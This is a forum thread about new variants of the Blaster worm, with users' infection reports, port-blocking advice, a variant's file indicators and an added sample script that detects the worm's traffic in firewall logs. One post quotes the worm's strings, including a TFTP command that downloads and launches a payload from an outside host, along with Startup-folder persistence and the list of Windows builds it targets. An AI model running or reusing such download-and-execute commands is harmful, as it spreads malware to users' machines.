Blaster worm - new versions
original worm: http://www.symantec.com/avcenter/ven...ster.worm.html
new version b: http://www.symantec.com/avcenter/ven...er.b.worm.html
new version c: http://www.symantec.com/avcenter/ven...er.c.worm.html
|
I got hit 40 mins ago, simply renamed the 2 exe files to txt so it would not be able to restart, and I ran the XP system restore. All fixed. :thumbsup
|
How do you get hit though, where does it most commonly go? msn... icq.....kazaa?
|
You can block with router or firewall.
TCP Port 135, "DCOM RPC"
UDP Port 69, "TFTP"
It's using a hole in Windows to get direct access; they just run up the IP chain from various sources, infecting users at random. As soon as it got me my router lit up like a Christmas tree and I noticed 2 new exe files on my c:\ drive. If you just disconnect the network from the taskbar you kill the connection and then you can restore your system with no problems. I even saved copies of the install for my collection. :1orglaugh
|
Quote:
the IP it's on and goes to those IPs' machines and then it continues.. Nothing to do with ICQ, mail or whatever - that's the cool thing |
Nah, you will know when it gets you because it starts sending packets to Microsoft to try and overload their servers. I did not get anything with the name Msblast.exe or by any of the names from the other 2 versions, so this is something different. It cannot be removed by simply killing the process, so the Symantec removal instructions might not be of much use.
Also if you reboot while infected it's not going to let you on the net and will shut you off every few mins. So if you do get hit then you better fix your system or restore before you reboot, or you will regret it when your connection is overloaded. It's got a calling card inside that's needed to hijack to your system and appears to only affect English Windows versions. You should block ports 130-140 from inbound connections just to be on the safe side unless you run services on any of those ports.
If you are infected you might find some of these files below on your machine. You will also find ctrl-alt-del (task manager) will close every time you open it to prevent you from killing the process.
c:\Documents and Settings\All Users\Start Menu\Programs\Startup\spynew.exe
c:\rootdir.exe
c:\wincgi32.exe
dink dink %s Exploitable! %s 135 open
start spynew.exe
tftp -i rpc.afraid.org GET spynew.exe
cd "\Documents and Settings\All Users\Start Menu\Programs\Startup\"
It looks for the following OS below and possibly won't affect non-English builds.
Windows XP SP1 (english)
Windows XP SP0 (english)
Windows 2000 SP4 (english)
Windows 2000 SP3 (english)
Windows 2000 SP2 (english)
Windows 2000 SP1 (english)
Windows 2000 SP0 (english)
|
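Added example (not part of the original posts): the posts above describe the infection arriving on TCP port 135 and the payload then being fetched over TFTP (UDP port 69). A sketch of a firewall-log check for that sequence; the log format, addresses, timestamps and the function name `find_suspect_hosts` are all constructed for illustration:

```python
import re
from datetime import datetime, timedelta

# Constructed firewall log lines (hypothetical format, not from the thread).
SAMPLE_LOG = """\
2003-08-12 10:15:02 ALLOW TCP 203.0.113.7:4123 -> 192.168.1.20:135
2003-08-12 10:15:09 ALLOW UDP 192.168.1.20:1045 -> 203.0.113.7:69
2003-08-12 10:16:30 DROP TCP 198.51.100.9:3321 -> 192.168.1.21:135
2003-08-12 10:16:40 ALLOW UDP 192.168.1.21:1050 -> 198.51.100.9:53
2003-08-12 10:20:00 ALLOW TCP 198.51.100.9:3400 -> 192.168.1.22:135
2003-08-12 11:30:00 ALLOW UDP 192.168.1.22:1060 -> 198.51.100.9:69
""".splitlines()

LINE_RE = re.compile(
    r"^(\S+ \S+) (ALLOW|DROP) (TCP|UDP) "
    r"([\d.]+):\d+ -> ([\d.]+):(\d+)$"
)

def find_suspect_hosts(lines, window=timedelta(minutes=5)):
    """Return hosts that accepted inbound TCP 135 and then sent outbound
    UDP 69 (TFTP) within `window`, the sequence the posts describe."""
    last_rpc = {}   # host -> time of last allowed connection to its port 135
    suspects = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that are not in the assumed format
        ts, action, proto, src, dst, dport = m.groups()
        if action != "ALLOW":
            continue  # dropped packets never reached the host
        when = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        if proto == "TCP" and dport == "135":
            last_rpc[dst] = when
        elif proto == "UDP" and dport == "69" and src in last_rpc:
            # TFTP request shortly after an RPC connection to the same host
            if when - last_rpc[src] <= window and src not in suspects:
                suspects.append(src)
    return suspects

if __name__ == "__main__":
    for host in find_suspect_hosts(SAMPLE_LOG):
        print("possible infection:", host)
```

The host whose port 135 traffic was dropped and the host whose TFTP request came over an hour later are not flagged with the default five-minute window.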
I was getting bombarded with hackers, it's my belief that my IP was displayed on a hacking site somewhere. It was getting so annoying that in the end I looked at all the files on the PC with a recent date stamp and deleted them "tee hee hee". After that I reinstalled Norton and ramped it up to full security, since then the fuckers have been knocked back. As soon as my current ADSL contract is up I'm going "dynamic"